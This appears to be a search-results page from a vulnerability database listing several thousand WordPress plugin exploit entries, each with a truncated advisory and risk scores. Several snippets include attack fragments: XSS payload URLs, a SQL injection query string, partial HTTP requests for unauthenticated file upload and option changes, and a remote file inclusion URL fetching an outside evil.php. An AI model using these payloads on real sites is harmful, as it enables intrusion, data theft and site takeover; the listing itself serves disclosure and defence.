Lucene search
K
WpexploitMost viewed

4359 matches found

wpexploit
wpexploit
•added 2021/10/25 12:0 a.m.•67 views

Ninja Tables < 4.1.8 - Admin+ Stored Cross-Site Cross-Site Scripting

The plugin does not sanitise and escape some of its table fields, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed Create a table, add a column with the following payload " as Name, then add data with the followin...

4.8CVSS0.9AI score0.00686EPSS
Exploits2References2
wpexploit
wpexploit
•added 2021/10/05 12:0 a.m.•67 views

Perfect Survey < 1.5.2 - Reflected Cross-Site Scripting

The plugin does not sanitise and escape multiple parameters id and filterssessionid of singlestatistics page, type and message of importexport page before outputting them back in pages/attributes in the admin dashboard, leading to Reflected Cross-Site Scripting issues...

0.008EPSS
Exploits2
wpexploit
wpexploit
•added 2020/05/28 12:0 a.m.•67 views

Final Tiles Gallery < 3.4.19 - Authenticated Stored Cross-Site Scripting (XSS)

Multiple cross-site scripting vulnerabilities in Final Tiles Gallery 3.4.18 and lower allow remote attackers to inject arbitrary web script or HTML via the Title and Caption fields of an image. Successful exploitation of this vulnerability would allow an authenticated high-privileged user author+...

3.5CVSS5.5AI score0.00892EPSS
Exploits2
wpexploit
wpexploit
•added 2020/01/09 12:0 a.m.•67 views

TownHub < 1.0.6 - Multiple Vulnerabilities

Multiple vulnerabilities was discovered in the 'TownHub - Directory & Listing WordPress Theme', tested version — v1.0.2: - Unauthenticated XSS - Authenticated Persistent XSS - IDOR Edit WPScanTeam: December 27h, 2019 - Envato Contacted January 5th, 2020 - Envato Investigating January 6th, 2020 -...

6.4CVSS6.5AI score0.03243EPSS
Exploits7References1
wpexploit
wpexploit
•added 2022/04/02 12:0 a.m.•66 views

Quick Adsense < 2.8.2 - Subscriber+ Post Stats Reset

The plugin does not have authorisation and CSRF checks in some of its AJAX actions allowing any authenticated users, such as subscribers to call them and reset Posts stats for example fetch"/wp-admin/admin-ajax.php", "headers": "accept": "/", "accept-language": "en-US,en;q=0.9", "content-type":...

1.3AI score
Exploits0
wpexploit
wpexploit
•added 2022/03/29 12:0 a.m.•66 views

DW Question & Answer Pro <= 1.3.4 - Multiple CSRF

The plugin does not properly check for CSRF in some of its functions, allowing attackers to make logged in users perform unwanted actions, such as update a comment or a question status. Vendor was notified via Envato on September 28th, 2021, but did not properly fix the issue and was notified...

4.3CVSS0.4AI score0.00421EPSS
Exploits2
wpexploit
wpexploit
•added 2022/01/24 12:0 a.m.•66 views

WP Dependency Installer < 4.3.1 - Subscriber+ Arbitrary Plugin Activation

The wp-dependency-installer library, used in the plugins does not have authorisation and CSRF checks in its dependencyinstaller AJAX action with the activate method, allowing any authenticated users, such as subscriber to activate arbitrary plugin installed on the blog. Furthermore, despite havin...

1.5AI score
Exploits0
wpexploit
wpexploit
•added 2021/11/29 12:0 a.m.•66 views

MOLIE <= 0.5 - Reflected Cross-Site Scripting

The plugin does not escape the courseid parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting issue https://example.com/wp-admin/admin.php?page=moliecoursecheck&courseid=alert/XSS/...

6.1CVSS1.2AI score0.0082EPSS
Exploits2
wpexploit
wpexploit
•added 2021/10/25 12:0 a.m.•66 views

EditableTable <= 0.1.4 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitise and escape any of the Table and Column fields, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed Create a new EDTB and put the following payload in the Table Name, Column Name or Column...

0.9AI score0.00588EPSS
Exploits2
wpexploit
wpexploit
•added 2021/05/07 12:0 a.m.•66 views

Leads-5050 Visitor Insights < 1.0.4 - Unauthenticated License Change

The leads5050setlicense AJAX action was available to unauthenticated users allowing them to set an arbitrary license in the plugins settings POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip,...

1.3AI score
Exploits0References1
wpexploit
wpexploit
•added 2020/07/28 12:0 a.m.•66 views

Comments - wpDiscuz 7.0.0 - 7.0.4 - Unauthenticated Arbitrary File Upload

This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server. POST /wp-admin/admin-ajax.php HTTP/1.1 Host: URL Content-Length: 774 Accept: / X-Requested-With: XMLHttpRequest User-Agent:...

7.5CVSS1AI score0.94535EPSS
Exploits19References2
wpexploit
wpexploit
•added 2017/05/02 12:0 a.m.•66 views

Avada Theme <= 5.1.4 - Stored Cross-Site Scripting (XSS) & CSRF

Description The Avada WordPress theme was affected by a Stored Cross-Site Scripting XSS & CSRF security vulnerability. http://cdn.wphutte.com/Avada/5.1.4/xss.html http://cdn.wphutte.com/Avada/5.1.4/csrf.html...

8.8CVSS6.8AI score0.00907EPSS
Exploits1References2
wpexploit
wpexploit
•added 2021/12/23 12:0 a.m.•65 views

WP125 < 1.5.5 - Arbitrary Ad Deletion via CSRF

The plugin does not have CSRF checks in various action, for example when deleting an ad, allowing attackers to make a logged in admin delete them via a CSRF attack https://example.com/wp-admin/admin.php?page=wp125addedit&deletead=1...

8.8CVSS4.4AI score0.00683EPSS
Exploits2References1
wpexploit
wpexploit
•added 2021/11/30 12:0 a.m.•65 views

LiteSpeed Cache < 4.4.4 - IP Check Bypass to Unauthenticated Stored XSS

The plugin does not properly verify that requests are coming from QUIC.cloud servers, allowing attackers to make requests to certain endpoints by using a specific X-Forwarded-For header value. In addition, one of the endpoint could be used to set CSS code if a setting is enabled, which will then ...

6.1CVSS0.2AI score0.01216EPSS
Exploits2
wpexploit
wpexploit
•added 2021/10/18 12:0 a.m.•65 views

Support Board < 3.3.6 - Arbitrary File Deletion via CSRF

The plugin does not have any CSRF checks in actions handled by the include/ajax.php file, which could allow attackers to make logged in users do unwanted actions. For example, make an admin delete arbitrary files...

1.1AI score0.00542EPSS
Exploits2References1
wpexploit
wpexploit
•added 2020/12/09 12:0 a.m.•65 views

DiveBook <= 1.1.4 - Unauthenticated Reflected XSS

:A reflected Cross-Site Scripting vulnerability exists within the DiveBook log's filter functionality. Arbitrary URL parameters are reflected into the application's response, rendered by the browser as HTML or JavaScript. An attacker may abuse this functionality by sending a victim a crafted link...

4.3CVSS0.4AI score0.00948EPSS
Exploits2References1
wpexploit
wpexploit
•added 2020/10/07 12:0 a.m.•65 views

HyperComments <= 1.2.2 - Unauthenticated Arbitrary File Deletion

The plugin does not validate and sanitise user input which is being concatenated to create a file path, passed to unlink, which leads to an arbitrary file deletion issue. For more details about this issue, please see the reference. File: hypercomments/hypercomments.php:112 $filename =...

1.2AI score
Exploits0References1
wpexploit
wpexploit
•added 2022/04/05 12:0 a.m.•64 views

Download Monitor < 4.5.91 - Admin+ Arbitrary File Download

The plugin does not ensure that files to be downloaded are inside the blog folders, and not sensitive, allowing high privilege users such as admin to download the wp-config.php or /etc/passwd even in an hardened environment or multisite setup. Create a new download, add a file and put the followi...

4.9CVSS1.2AI score0.0093EPSS
Exploits2
wpexploit
wpexploit
•added 2021/12/21 12:0 a.m.•64 views

Shortcode Addons < 3.1.0 - Unauthenticated Arbitrary Option Update

The plugin does not have any authorisation in its REST API endpoint, one of them could allow unauthenticated attackers to update arbitrary blog options. POST /wp-json/ShortCodeAddonsUltimate/v2/addonssettings HTTP/1.1 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate...

1.3AI score
Exploits0
wpexploit
wpexploit
•added 2021/11/29 12:0 a.m.•64 views

Typebot < 1.4.3 - Admin+ Stored Cross Site Scripting

The plugin does not sanitise and escape the Publish ID setting, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed. Put the following payload in the 'Publish ID or Full URL" setting and save: "...

4.8CVSS0.9AI score0.00598EPSS
Exploits2
wpexploit
wpexploit
•added 2021/10/05 12:0 a.m.•64 views

Perfect Survey < 1.5.2 - Unauthorised AJAX Call to Stored XSS / Survey Settings Update

The plugin does not have proper authorisation nor CSRF checks in the saveglobalsetting AJAX action, allowing unauthenticated users to edit surveys and modify settings. Given the lack of sanitisation and escaping in the settings, this could also lead to a Stored Cross-Site Scripting issue which wi...

0.6AI score0.00644EPSS
Exploits2
wpexploit
wpexploit
•added 2020/07/02 12:0 a.m.•64 views

Payment Form For Paypal Pro < 1.1.65 - Unauthenticated SQL Injection

The 'query' parameter allowed for any unauthenticated user to perform SQL queries with result output to a web page in JSON format. https://example.com/?cffaction=getdatafromdatabase&query=SELECT%20%20from%20wpposts...

7.5CVSS2AI score0.9453EPSS
Exploits1References1
wpexploit
wpexploit
•added 2023/06/20 12:0 a.m.•63 views

3DPrint < 3.5.6.9 - CSRF to arbitrary file downlad

Description The plugin does not protect against CSRF attacks in the modified version of Tiny File Manager included with the plugin, allowing an attacker to craft a malicious request that will create an archive of any files or directories on the target server by tricking a logged in admin into...

5.3CVSS7.1AI score0.003EPSS
Exploits2References1
wpexploit
wpexploit
•added 2022/02/17 12:0 a.m.•63 views

Kunze Law < 2.1 - Admin+ Stored Cross-Site Scripting

The plugin does not escape its 'E-Mail Error "From" Address' settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed Put the following payload in the 'E-Mail Error "From" Address' settings of the plugin:...

4.8CVSS0.7AI score0.00612EPSS
Exploits2
wpexploit
wpexploit
•added 2021/11/29 12:0 a.m.•63 views

CorreosExpress <= 2.6.0 - Sensitive Information Disclosure

The plugin generates log files which are publicly accessible, and contain sensitive information such as sender/receiver names, phone numbers, physical and email addresses https://example.com/wp-content/plugins/correos-express/log/logcronfunction.txt...

5.3CVSS0.5AI score0.01179EPSS
Exploits2
wpexploit
wpexploit
•added 2020/11/09 12:0 a.m.•63 views

Ultimate Member < 2.1.12 - Unauthenticated Privilege Escalation via User Roles

Due to the lack of filtering on the role parameter that could be supplied during the registration process, an attacker could supply the role parameter with a WordPress capability or any custom Ultimate Member role and effectively be granted those privileges. $username, 'firstname-'. $formid =...

7.5CVSS1.6AI score0.02961EPSS
Exploits2References1
wpexploit
wpexploit
•added 2020/05/25 12:0 a.m.•63 views

Official MailerLite Sign Up Forms < 1.4.4 - Unauthenticated SQL Injection

Most methods in the MailerLite plugin do not sanitize user input data which causes SQL injection. Also no single method checks for a nonce token which causes a CSRF issue everywhere. One example would be to inject the payload 1 union all select database,2,3,1,5 into the formid GET parameter of th...

0.8AI score
Exploits0References1
wpexploit
wpexploit
•added 2022/09/27 12:0 a.m.•62 views

Forym <= 1.5.8 - Reflected Cross-Site Scripting

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting On a blog having the plugin and the Search Forum Widget active, append the following parameter: ?s="...

0.2AI score
Exploits0References1
wpexploit
wpexploit
•added 2021/12/07 12:0 a.m.•62 views

10Web Social Photo Feed < 1.4.29 - Reflected Cross-Site Scripting (XSS)

The plugin was affected by a reflected Cross-Site Scripting XSS vulnerability in the wdiapplychanges admin page, allowing an attacker to perform such attack against any logged in users...

6.1CVSS3.6AI score0.008EPSS
Exploits2
wpexploit
wpexploit
•added 2021/12/02 12:0 a.m.•62 views

Post Duplicator < 2.27 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitise and escape its Duplicate Title and Slug settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed Put the following payload in the "Duplicate Title" or "Duplicate Slug"...

5.4CVSS0.4AI score0.00627EPSS
Exploits2
wpexploit
wpexploit
•added 2021/11/12 12:0 a.m.•62 views

GRAND FlaGallery <= 6.1.2 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitise and escape some of its gallery settings, which could allow high privilege users to perform Cross-Site scripting attacks even when the unfilteredhtml capability is disallowed. Create/edit a gallery and put the following payload in the "Back Button Text" setting, then...

4.8CVSS4.9AI score0.00588EPSS
Exploits2
wpexploit
wpexploit
•added 2021/10/16 12:0 a.m.•62 views

Speed Booster Pack < 4.3.3.1 - Admin+ SQL Injection

The plugin does not escape the sbpconverttablename parameter before using it in a SQL statement to convert the related table, leading to an SQL injection https://example.com/wp-admin/admin-ajax.php?action=sbpdatabaseaction&sbpaction=converttables&sbpconverttablename=SQLi&nonce=b2d6208254 The nonc...

7.2CVSS0.4AI score0.01112EPSS
Exploits2References1
wpexploit
wpexploit
•added 2022/04/25 12:0 a.m.•61 views

Content Egg < 5.3.1 - Reflected Cross-Site Scripting

The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting https://example.com/wp-admin/admin.php?page=content-egg-autoblog-edit&a"alert/XSS/...

0.1AI score
Exploits0
wpexploit
wpexploit
•added 2018/10/08 12:0 a.m.•61 views

WPML <= 3.6.3 - Unauthenticated Stored Cross-Site Scripting (XSS)

The sitepress-multilingual-cms WordPress plugin was affected by an Unauthenticated Stored Cross-Site Scripting XSS security vulnerability. POST /wp-admin/admin.php?page=sitepress-multilingual-cms-3.6.3%2Fmenu%2Ftheme-localization.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 Windows NT 6.1...

4.3CVSS0.6AI score0.13207EPSS
Exploits2References1
wpexploit
wpexploit
•added 2022/03/15 12:0 a.m.•60 views

Easy Social Icons < 3.2.0 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitise and escape its saved settings before outputting them in attributes, which could allow high privilege users to perform Cross-Site Scripting attacks when the unfilteredhtml capability is disallowed. 3.1.3 added some escaping, but data was output elsewhere Put the...

0.2AI score
Exploits0
wpexploit
wpexploit
•added 2022/01/11 12:0 a.m.•60 views

Adaptive Images < 0.6.69 - Reflected Cross-Site Scripting

The plugin does not sanitise and escape the REQUESTURI before outputting it back in a page, leading to a Reflected Cross-Site Scripting issue https://example.com/wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert/XSS/%3E/?debug=true...

1AI score
Exploits0References1
wpexploit
wpexploit
•added 2021/11/23 12:0 a.m.•60 views

HTML5 Responsive FAQ <= 2.8.5 - Admin+ Stored Cross-Site Scripting

The plugin does not properly sanitise and escape some of its settings, which could allow a high privilege users to perform Cross-Site Scripting attacks even when the unfilteredhtml is disallowed Put the following payload in the "Text size of answer in pixels" settings: alert'XSS'; The XSS will be...

4.8CVSS4.8AI score0.00588EPSS
Exploits2
wpexploit
wpexploit
•added 2021/12/06 12:0 a.m.•59 views

Booking Calendar < 8.9.2 - Reflected Cross-Site Scripting

The plugin does not sanitise and escape the bookingtype parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting https://example.com/wp-admin/admin.php?page=wpbc&bookingtype=%22%3E%3Cimg+src+onerror%3Dalert%28/XSS/%29%3E%3Cscript%3E%2F%2A...

6.1CVSS0.8AI score0.008EPSS
Exploits2
wpexploit
wpexploit
•added 2021/12/06 12:0 a.m.•59 views

Stars Rating < 3.5.1 - Comments Denial of Service

The plugin does not validate the submitted rating, allowing submission of long integer, causing a Denial of Service in the comments section, or pending comment dashboard depending if the user sent it as unauthenticated or authenticated. Enable rating for a post/page, add a comment, capture the...

7.5CVSS0.8AI score0.01553EPSS
Exploits2
wpexploit
wpexploit
•added 2021/12/05 12:0 a.m.•59 views

Modal Window < 5.2.2 - RFI leading to RCE via CSRF

The plugin within the wow-company admin menu page allows to include arbitrary file with PHP extension as well as with data:// or http:// protocols, thus leading to CSRF RCE. http://127.0.0.1:8001/wp-admin/admin.php?page=wow-company&tab=https%3A%2F%2Fstatic.kazet.cc%2Fevil.php%3F PHP's...

8.8CVSS1.4AI score0.00773EPSS
Exploits2References1
wpexploit
wpexploit
•added 2021/01/08 12:0 a.m.•59 views

Modal Survey < 2.0.1.8.2 - Authenticated PHP Object Injection

The Unserialize function is used multiple times in the code, for example when importing custom surveys. This could allow a malicious administrator to import a crafted JSON to trigger a PHP Object Injection vulnerability "name":"Open Text Answer Sample", "id":"924478511", "options":"", "global":"0...

0.5AI score
Exploits0References1
wpexploit
wpexploit
•added 2020/11/27 12:0 a.m.•59 views

Age Gate < 2.13.5 - Unauthenticated Open Redirect

The plugin takes the wphttpreferer parameter to redirect users after some actions as well as after invalid or missing nonces, leading to an Unauthenticated Open Redirect issue...

0.7AI score
Exploits0References1
wpexploit
wpexploit
•added 2020/10/09 12:0 a.m.•59 views

Autoptimize < 2.7.8 - Arbitrary File Upload via "Import Settings"

The plugin attempts to delete malicious files such as .php form the uploaded archive via the "Import Settings" feature, after its extraction. However, the extracted folders are not checked and it is possible to upload a zip which contained a directory with PHP file in it and then it is not remove...

0.9AI score0.13139EPSS
Exploits7
wpexploit
wpexploit
•added 2020/02/29 12:0 a.m.•60 views

Booked < 2.2.6 - Broken Authentication to Export Users Data in CSV

The plugin allows users to Book Appointment by providing their PII such as Email, Name, Phone Number and Personal Message. The vulnerability allows anyone to Dump all records of users and their appointment details in CSV as an unauthenticated user. The user also gets registered as a WP User after...

7.3AI score
Exploits0References2
wpexploit
wpexploit
•added 2022/03/29 12:0 a.m.•58 views

DW Question & Answer Pro <= 1.3.4 - Arbitrary Comment Edition via IDOR

The plugin does not check that the comment to edit belongs to the user making the request, allowing any user to edit other comments. Vendor was notified via Envato on September 28th, 2021, but did not properly fix the issue and was notified numerous times since. As any authenticated user, post a...

4.3CVSS0.7AI score0.00632EPSS
Exploits2
wpexploit
wpexploit
•added 2021/11/23 12:0 a.m.•58 views

IDPay for Contact Form 7 <= 2.1.2 - Reflected Cross-Site Scripting

The plugin does not sanitise and escape the idpayerror parameter before outputting it back in the page leading to a Reflected Cross-Site Scripting Append the following payload on a page where a form with an idPay payment interface is embed: &idpayerror=alert/XSS/ Example:...

6.1CVSS0.00788EPSS
Exploits2
wpexploit
wpexploit
•added 2022/04/05 12:0 a.m.•57 views

Ad Invalid Click Protector (AICP) < 1.2.7 - Reflected Cross-Site Scripting

The plugin does not have sanitise and escape the page parameter before outputting it back in an attribute, leading to a Reflected cross-Site Scripting alert/XSS/' /...

7AI score
Exploits0
wpexploit
wpexploit
•added 2022/03/28 12:0 a.m.•57 views

Shopping Cart & eCommerce Store < 5.2.5 - Arbitrary Design Settings Update via CSRF

The plugin is lacking CSRF checks in various AJAX actions, such as ecadminajaxsavedesignsettings, which could allow attackers to make a logged in admin update arbitrary settings To disable the Live Design Editor To set the custom CSS setting to body background-color: red;...

1.2AI score
Exploits0
wpexploit
wpexploit
•added 2021/12/08 12:0 a.m.•57 views

PublishPress Capabilities < 2.3.1 - Unauthenticated Arbitrary Options Update to Blog Compromise

The plugin does not have authorisation and CSRF checks when updating the plugin's settings via the init hook, and does not ensure that the options to be updated belong to the plugin. As a result, unauthenticated attackers could update arbitrary blog options, such as the default role and make any...

9.8CVSS0.6AI score0.06745EPSS
Exploits2References1
wpexploit
wpexploit
•added 2021/07/12 12:0 a.m.•57 views

Page View Counts < 2.4.9 - Contributor+ Stored XSS

The plugin does not escape the postid parameter of pvcstats shortcode, allowing users with a role as low as Contributor to perform Stored XSS attacks. A post made by a contributor would still have to be approved by an admin to have the XSS triggered in the frontend, however, higher privilege user...

3.5CVSS1.7AI score0.00624EPSS
Exploits2
Total number of security vulnerabilities4359